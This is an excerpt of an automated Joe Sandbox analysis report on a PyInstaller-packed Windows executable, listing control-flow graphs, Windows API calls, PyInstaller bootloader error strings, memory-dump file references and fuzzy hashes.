                                                                                                                                                                                                                                                                          control_flow_graph 381 7ff7fbdc1000-7ff7fbdc39d6 call 7ff7fbdcff60 call 7ff7fbdcff58 call 7ff7fbdc86b0 call 7ff7fbdcff58 call 7ff7fbdcbc60 call 7ff7fbdd52f0 call 7ff7fbdd5ef8 call 7ff7fbdc1eb0 399 7ff7fbdc3ad2 381->399 400 7ff7fbdc39dc-7ff7fbdc39ec call 7ff7fbdc3ec0 381->400 401 7ff7fbdc3ad7-7ff7fbdc3af7 call 7ff7fbdcbcc0 399->401 400->399 406 7ff7fbdc39f2-7ff7fbdc3a05 call 7ff7fbdc3d90 400->406 406->399 409 7ff7fbdc3a0b-7ff7fbdc3a32 call 7ff7fbdc7b60 406->409 412 7ff7fbdc3a74-7ff7fbdc3a9c call 7ff7fbdc8040 call 7ff7fbdc1cb0 409->412 413 7ff7fbdc3a34-7ff7fbdc3a43 call 7ff7fbdc7b60 409->413 424 7ff7fbdc3aa2-7ff7fbdc3ab8 call 7ff7fbdc1cb0 412->424 425 7ff7fbdc3b71-7ff7fbdc3b82 412->425 413->412 418 7ff7fbdc3a45-7ff7fbdc3a4b 413->418 420 7ff7fbdc3a57-7ff7fbdc3a71 call 7ff7fbdd4f7c call 7ff7fbdc8040 418->420 421 7ff7fbdc3a4d-7ff7fbdc3a55 418->421 420->412 421->420 435 7ff7fbdc3aba-7ff7fbdc3acd call 7ff7fbdc2b30 424->435 436 7ff7fbdc3af8-7ff7fbdc3afb 424->436 428 7ff7fbdc3b84-7ff7fbdc3b8b 425->428 429 7ff7fbdc3b9e-7ff7fbdc3ba1 425->429 428->429 432 7ff7fbdc3b8d-7ff7fbdc3b90 call 7ff7fbdc14f0 428->432 433 7ff7fbdc3ba3-7ff7fbdc3ba9 429->433 434 7ff7fbdc3bb7-7ff7fbdc3bcf call 7ff7fbdc8ae0 429->434 446 7ff7fbdc3b95-7ff7fbdc3b98 432->446 439 7ff7fbdc3bef-7ff7fbdc3bfc call 7ff7fbdc6de0 433->439 440 7ff7fbdc3bab-7ff7fbdc3bb5 433->440 447 7ff7fbdc3be2-7ff7fbdc3be9 SetDllDirectoryW 434->447 448 7ff7fbdc3bd1-7ff7fbdc3bdd call 7ff7fbdc2b30 434->448 435->399 436->425 445 7ff7fbdc3afd-7ff7fbdc3b14 call 7ff7fbdc3fd0 436->445 452 7ff7fbdc3c47-7ff7fbdc3c4c call 7ff7fbdc6d60 439->452 453 7ff7fbdc3bfe-7ff7fbdc3c0b call 7ff7fbdc6a90 439->453 440->434 440->439 458 7ff7fbdc3b16-7ff7fbdc3b19 445->458 459 7ff7fbdc3b1b-7ff7fbdc3b47 call 7ff7fbdc82b0 445->459 446->399 446->429 447->439 448->399 460 7ff7fbdc3c51-7ff7fbdc3c54 452->460 453->452 467 7ff7fbdc3c0d-7ff7fbdc3c1c call 7ff7fbdc65f0 453->467 462 7ff7fbdc3b56-7ff7fbdc3b6c call 7ff7fbdc2b30 458->462 459->425 469 7ff7fbdc3b49-7ff7fbdc3b51 call 7ff7fbdd018c 459->469 465 7ff7fbdc3d06-7ff7fbdc3d15 call 7ff7fbdc34c0 460->465 466 7ff7fbdc3c5a-7ff7fbdc3c67 460->466 462->399 465->399 479 7ff7fbdc3d1b-7ff7fbdc3d4d call 7ff7fbdc7fd0 call 7ff7fbdc7b60 call 7ff7fbdc3620 call 7ff7fbdc8080 465->479 471 7ff7fbdc3c70-7ff7fbdc3c7a 466->471 483 7ff7fbdc3c1e-7ff7fbdc3c2a call 7ff7fbdc6570 467->483 484 7ff7fbdc3c3d-7ff7fbdc3c42 call 7ff7fbdc6840 467->484 469->462 475 7ff7fbdc3c83-7ff7fbdc3c85 471->475 476 7ff7fbdc3c7c-7ff7fbdc3c81 471->476 481 7ff7fbdc3cd1-7ff7fbdc3d01 call 7ff7fbdc3620 call 7ff7fbdc3460 call 7ff7fbdc3610 call 7ff7fbdc6840 call 7ff7fbdc6d60 475->481 482 7ff7fbdc3c87-7ff7fbdc3caa call 7ff7fbdc1ef0 475->482 476->471 476->475 509 7ff7fbdc3d52-7ff7fbdc3d6f call 7ff7fbdc6840 call 7ff7fbdc6d60 479->509 481->401 482->399 494 7ff7fbdc3cb0-7ff7fbdc3cba 482->494 483->484 495 7ff7fbdc3c2c-7ff7fbdc3c3b call 7ff7fbdc6c30 483->495 484->452 498 7ff7fbdc3cc0-7ff7fbdc3ccf 494->498 495->460 498->481 498->498 517 7ff7fbdc3d71-7ff7fbdc3d78 call 7ff7fbdc7d40 509->517 518 7ff7fbdc3d7d-7ff7fbdc3d87 call 7ff7fbdc1e80 509->518 517->518 518->401
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDC3EC0: GetModuleFileNameW.KERNEL32(?,00007FF7FBDC39EA), ref: 00007FF7FBDC3EF1
                                                                                                                                                                                                                                                                          • SetDllDirectoryW.KERNEL32 ref: 00007FF7FBDC3BE9
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDC7B60: GetEnvironmentVariableW.KERNEL32(00007FF7FBDC3A1F), ref: 00007FF7FBDC7B9A
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDC7B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7FBDC7BB7
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                                                                                                                                                                          • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                                                                                                                                                                          • API String ID: 2344891160-3602715111
                                                                                                                                                                                                                                                                          • Opcode ID: bc804580661d330fd68571be0a8a6f4046a9eb4bd7f0ff81acb8572ffe878501
                                                                                                                                                                                                                                                                          • Instruction ID: 9be9bfbfec1cd1ccf66a7231f39395f09056c0a0c250d110ee90f6bdb5ec5581
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc804580661d330fd68571be0a8a6f4046a9eb4bd7f0ff81acb8572ffe878501
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03B1D0A1A1D68340EB2DBB29D5506FDA250BF44794FC00131EA6D476FAEE3CE505C7E2

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 522 7ff7fbdc1050-7ff7fbdc10ab call 7ff7fbdcb4e0 525 7ff7fbdc10d3-7ff7fbdc10eb call 7ff7fbdd4f90 522->525 526 7ff7fbdc10ad-7ff7fbdc10d2 call 7ff7fbdc2b30 522->526 531 7ff7fbdc1109-7ff7fbdc1119 call 7ff7fbdd4f90 525->531 532 7ff7fbdc10ed-7ff7fbdc1104 call 7ff7fbdc2890 525->532 538 7ff7fbdc1137-7ff7fbdc1147 531->538 539 7ff7fbdc111b-7ff7fbdc1132 call 7ff7fbdc2890 531->539 537 7ff7fbdc126c-7ff7fbdc1281 call 7ff7fbdcb1c0 call 7ff7fbdd4f7c * 2 532->537 555 7ff7fbdc1286-7ff7fbdc12a0 537->555 541 7ff7fbdc1150-7ff7fbdc1175 call 7ff7fbdd04dc 538->541 539->537 549 7ff7fbdc125e 541->549 550 7ff7fbdc117b-7ff7fbdc1185 call 7ff7fbdd0250 541->550 552 7ff7fbdc1264 549->552 550->549 556 7ff7fbdc118b-7ff7fbdc1197 550->556 552->537 557 7ff7fbdc11a0-7ff7fbdc11c8 call 7ff7fbdc9990 556->557 560 7ff7fbdc1241-7ff7fbdc125c call 7ff7fbdc2b30 557->560 561 7ff7fbdc11ca-7ff7fbdc11cd 557->561 560->552 562 7ff7fbdc11cf-7ff7fbdc11d9 561->562 563 7ff7fbdc123c 561->563 565 7ff7fbdc1203-7ff7fbdc1206 562->565 566 7ff7fbdc11db-7ff7fbdc11e8 call 7ff7fbdd0c1c 562->566 563->560 569 7ff7fbdc1219-7ff7fbdc121e 565->569 570 7ff7fbdc1208-7ff7fbdc1216 call 7ff7fbdcca40 565->570 573 7ff7fbdc11ed-7ff7fbdc11f0 566->573 569->557 572 7ff7fbdc1220-7ff7fbdc1223 569->572 570->569 575 7ff7fbdc1225-7ff7fbdc1228 572->575 576 7ff7fbdc1237-7ff7fbdc123a 572->576 577 7ff7fbdc11f2-7ff7fbdc11fc call 7ff7fbdd0250 573->577 578 7ff7fbdc11fe-7ff7fbdc1201 573->578 575->560 579 7ff7fbdc122a-7ff7fbdc1232 575->579 576->552 577->569 577->578 578->560 579->541
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                                                                          • String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                                          • API String ID: 2030045667-1655038675
                                                                                                                                                                                                                                                                          • Opcode ID: 88534f2458b0e3989dbead5018ec6a961dab2d1cdbb689051e36372a7615677e
                                                                                                                                                                                                                                                                          • Instruction ID: 5b1208a3e3bead857d70367b7055c7adb5cf181ea84abbd5baa46221b2043f86
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88534f2458b0e3989dbead5018ec6a961dab2d1cdbb689051e36372a7615677e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B85100A6A0969385EB28BB59A4403BAE294FF84784FC44035ED6D477E5EF3CE400C7D2

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 653 7ff7fbddc01c-7ff7fbddc042 654 7ff7fbddc044-7ff7fbddc058 call 7ff7fbdd54a4 call 7ff7fbdd54c4 653->654 655 7ff7fbddc05d-7ff7fbddc061 653->655 671 7ff7fbddc44e 654->671 657 7ff7fbddc437-7ff7fbddc443 call 7ff7fbdd54a4 call 7ff7fbdd54c4 655->657 658 7ff7fbddc067-7ff7fbddc06e 655->658 677 7ff7fbddc449 call 7ff7fbddaea4 657->677 658->657 660 7ff7fbddc074-7ff7fbddc0a2 658->660 660->657 663 7ff7fbddc0a8-7ff7fbddc0af 660->663 666 7ff7fbddc0b1-7ff7fbddc0c3 call 7ff7fbdd54a4 call 7ff7fbdd54c4 663->666 667 7ff7fbddc0c8-7ff7fbddc0cb 663->667 666->677 669 7ff7fbddc433-7ff7fbddc435 667->669 670 7ff7fbddc0d1-7ff7fbddc0d7 667->670 674 7ff7fbddc451-7ff7fbddc468 669->674 670->669 675 7ff7fbddc0dd-7ff7fbddc0e0 670->675 671->674 675->666 678 7ff7fbddc0e2-7ff7fbddc107 675->678 677->671 681 7ff7fbddc13a-7ff7fbddc141 678->681 682 7ff7fbddc109-7ff7fbddc10b 678->682 686 7ff7fbddc143-7ff7fbddc16b call 7ff7fbdddbbc call 7ff7fbddaf0c * 2 681->686 687 7ff7fbddc116-7ff7fbddc12d call 7ff7fbdd54a4 call 7ff7fbdd54c4 call 7ff7fbddaea4 681->687 684 7ff7fbddc132-7ff7fbddc138 682->684 685 7ff7fbddc10d-7ff7fbddc114 682->685 690 7ff7fbddc1b8-7ff7fbddc1cf 684->690 685->684 685->687 714 7ff7fbddc16d-7ff7fbddc183 call 7ff7fbdd54c4 call 7ff7fbdd54a4 686->714 715 7ff7fbddc188-7ff7fbddc1b3 call 7ff7fbddc844 686->715 718 7ff7fbddc2c0 687->718 693 7ff7fbddc1d1-7ff7fbddc1d9 690->693 694 7ff7fbddc24a-7ff7fbddc254 call 7ff7fbde3f8c 690->694 693->694 695 7ff7fbddc1db-7ff7fbddc1dd 693->695 706 7ff7fbddc2de 694->706 707 7ff7fbddc25a-7ff7fbddc26f 694->707 695->694 699 7ff7fbddc1df-7ff7fbddc1f5 695->699 699->694 703 7ff7fbddc1f7-7ff7fbddc203 699->703 703->694 708 7ff7fbddc205-7ff7fbddc207 703->708 710 7ff7fbddc2e3-7ff7fbddc303 ReadFile 706->710 707->706 712 7ff7fbddc271-7ff7fbddc283 GetConsoleMode 707->712 708->694 713 7ff7fbddc209-7ff7fbddc221 708->713 716 7ff7fbddc3fd-7ff7fbddc406 GetLastError 710->716 717 7ff7fbddc309-7ff7fbddc311 710->717 712->706 719 7ff7fbddc285-7ff7fbddc28d 712->719 713->694 723 7ff7fbddc223-7ff7fbddc22f 713->723 714->718 715->690 720 7ff7fbddc423-7ff7fbddc426 716->720 721 7ff7fbddc408-7ff7fbddc41e call 7ff7fbdd54c4 call 7ff7fbdd54a4 716->721 717->716 725 7ff7fbddc317 717->725 722 7ff7fbddc2c3-7ff7fbddc2cd call 7ff7fbddaf0c 718->722 719->710 727 7ff7fbddc28f-7ff7fbddc2b1 ReadConsoleW 719->727 731 7ff7fbddc42c-7ff7fbddc42e 720->731 732 7ff7fbddc2b9-7ff7fbddc2bb call 7ff7fbdd5438 720->732 721->718 722->674 723->694 730 7ff7fbddc231-7ff7fbddc233 723->730 734 7ff7fbddc31e-7ff7fbddc333 725->734 736 7ff7fbddc2b3 GetLastError 727->736 737 7ff7fbddc2d2-7ff7fbddc2dc 727->737 730->694 741 7ff7fbddc235-7ff7fbddc245 730->741 731->722 732->718 734->722 743 7ff7fbddc335-7ff7fbddc340 734->743 736->732 737->734 741->694 746 7ff7fbddc342-7ff7fbddc35b call 7ff7fbddbc34 743->746 747 7ff7fbddc367-7ff7fbddc36f 743->747 755 7ff7fbddc360-7ff7fbddc362 746->755 748 7ff7fbddc371-7ff7fbddc383 747->748 749 7ff7fbddc3eb-7ff7fbddc3f8 call 7ff7fbddba74 747->749 752 7ff7fbddc385 748->752 753 7ff7fbddc3de-7ff7fbddc3e6 748->753 749->755 756 7ff7fbddc38a-7ff7fbddc391 752->756 753->722 755->722 758 7ff7fbddc393-7ff7fbddc397 756->758 759 7ff7fbddc3cd-7ff7fbddc3d8 756->759 760 7ff7fbddc3b3 758->760 761 7ff7fbddc399-7ff7fbddc3a0 758->761 759->753 763 7ff7fbddc3b9-7ff7fbddc3c9 760->763 761->760 762 7ff7fbddc3a2-7ff7fbddc3a6 761->762 762->760 764 7ff7fbddc3a8-7ff7fbddc3b1 762->764 763->756 765 7ff7fbddc3cb 763->765 764->763 765->753
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                          • Opcode ID: be7416da91f84ed5bfdd546aa92e4ee07cb2f4e154380db95b5ab7bb0620c26f
                                                                                                                                                                                                                                                                          • Instruction ID: c2b008c9083515b440dfb09231a9fb1468753705b74176fd2d3348ac600a5758
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be7416da91f84ed5bfdd546aa92e4ee07cb2f4e154380db95b5ab7bb0620c26f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BC1E92290CB8781E759AB5C94402BDBB54EF89BC4FD94131D9AD07BF1CE7CE44683A2

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 876 7ff7fbddd520-7ff7fbddd545 877 7ff7fbddd813 876->877 878 7ff7fbddd54b-7ff7fbddd54e 876->878 881 7ff7fbddd815-7ff7fbddd825 877->881 879 7ff7fbddd550-7ff7fbddd582 call 7ff7fbddadd8 878->879 880 7ff7fbddd587-7ff7fbddd5b3 878->880 879->881 883 7ff7fbddd5b5-7ff7fbddd5bc 880->883 884 7ff7fbddd5be-7ff7fbddd5c4 880->884 883->879 883->884 886 7ff7fbddd5d4-7ff7fbddd5e9 call 7ff7fbde3f8c 884->886 887 7ff7fbddd5c6-7ff7fbddd5cf call 7ff7fbddc8e0 884->887 891 7ff7fbddd703-7ff7fbddd70c 886->891 892 7ff7fbddd5ef-7ff7fbddd5f8 886->892 887->886 894 7ff7fbddd760-7ff7fbddd785 WriteFile 891->894 895 7ff7fbddd70e-7ff7fbddd714 891->895 892->891 893 7ff7fbddd5fe-7ff7fbddd602 892->893 896 7ff7fbddd604-7ff7fbddd60c call 7ff7fbdd4900 893->896 897 7ff7fbddd613-7ff7fbddd61e 893->897 898 7ff7fbddd790 894->898 899 7ff7fbddd787-7ff7fbddd78d GetLastError 894->899 900 7ff7fbddd716-7ff7fbddd719 895->900 901 7ff7fbddd74c-7ff7fbddd75e call 7ff7fbddcfd8 895->901 896->897 903 7ff7fbddd620-7ff7fbddd629 897->903 904 7ff7fbddd62f-7ff7fbddd644 GetConsoleMode 897->904 906 7ff7fbddd793 898->906 899->898 907 7ff7fbddd71b-7ff7fbddd71e 900->907 908 7ff7fbddd738-7ff7fbddd74a call 7ff7fbddd1f8 900->908 923 7ff7fbddd6f0-7ff7fbddd6f7 901->923 903->891 903->904 913 7ff7fbddd6fc 904->913 914 7ff7fbddd64a-7ff7fbddd650 904->914 916 7ff7fbddd798 906->916 909 7ff7fbddd7a4-7ff7fbddd7ae 907->909 910 7ff7fbddd724-7ff7fbddd736 call 7ff7fbddd0dc 907->910 908->923 917 7ff7fbddd7b0-7ff7fbddd7b5 909->917 918 7ff7fbddd80c-7ff7fbddd811 909->918 910->923 913->891 921 7ff7fbddd656-7ff7fbddd659 914->921 922 7ff7fbddd6d9-7ff7fbddd6eb call 7ff7fbddcb60 914->922 924 7ff7fbddd79d 916->924 925 7ff7fbddd7e3-7ff7fbddd7ed 917->925 926 7ff7fbddd7b7-7ff7fbddd7ba 917->926 918->881 928 7ff7fbddd664-7ff7fbddd672 921->928 929 7ff7fbddd65b-7ff7fbddd65e 921->929 922->923 923->916 924->909 933 7ff7fbddd7f4-7ff7fbddd803 925->933 934 7ff7fbddd7ef-7ff7fbddd7f2 925->934 931 7ff7fbddd7d3-7ff7fbddd7de call 7ff7fbdd5480 926->931 932 7ff7fbddd7bc-7ff7fbddd7cb 926->932 935 7ff7fbddd674 928->935 936 7ff7fbddd6d0-7ff7fbddd6d4 928->936 929->924 929->928 931->925 932->931 933->918 934->877 934->933 938 7ff7fbddd678-7ff7fbddd68f call 7ff7fbde4058 935->938 936->906 942 7ff7fbddd691-7ff7fbddd69d 938->942 943 7ff7fbddd6c7-7ff7fbddd6cd GetLastError 938->943 944 7ff7fbddd69f-7ff7fbddd6b1 call 7ff7fbde4058 942->944 945 7ff7fbddd6bc-7ff7fbddd6c3 942->945 943->936 944->943 949 7ff7fbddd6b3-7ff7fbddd6ba 944->949 945->936 947 7ff7fbddd6c5 945->947 947->938 949->945
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7FBDDD50B), ref: 00007FF7FBDDD63C
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7FBDDD50B), ref: 00007FF7FBDDD6C7
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 953036326-0
                                                                                                                                                                                                                                                                          • Opcode ID: 9c71bbc92960716eb9d411b0b48861d3e4dcea1db34bc3604978879cc3cc685b
                                                                                                                                                                                                                                                                          • Instruction ID: 94dbcca4dc40e5cfdff5f0bcbb10b4a5f3e9a8916e2f48d2e239a6d520061286
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c71bbc92960716eb9d411b0b48861d3e4dcea1db34bc3604978879cc3cc685b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA911B32F0865795FB58AF6D94402BDABA0BB48788FD44135CEAE136E4CF38D445C3A2

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4170891091-0
                                                                                                                                                                                                                                                                          • Opcode ID: 576313037ba361094b23b779854add166a997b8059c5947e2a7d8f77b38f16ad
                                                                                                                                                                                                                                                                          • Instruction ID: 098031daa8b9798158fe0f9c5a9409f3847d1a6ac2acac42fe5b5bfa8329ed94
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 576313037ba361094b23b779854add166a997b8059c5947e2a7d8f77b38f16ad
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0251E672F0421386EB1CEF689D556BCA7A1AB48358FD00139DD6D52AF5DB3CA401C792

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
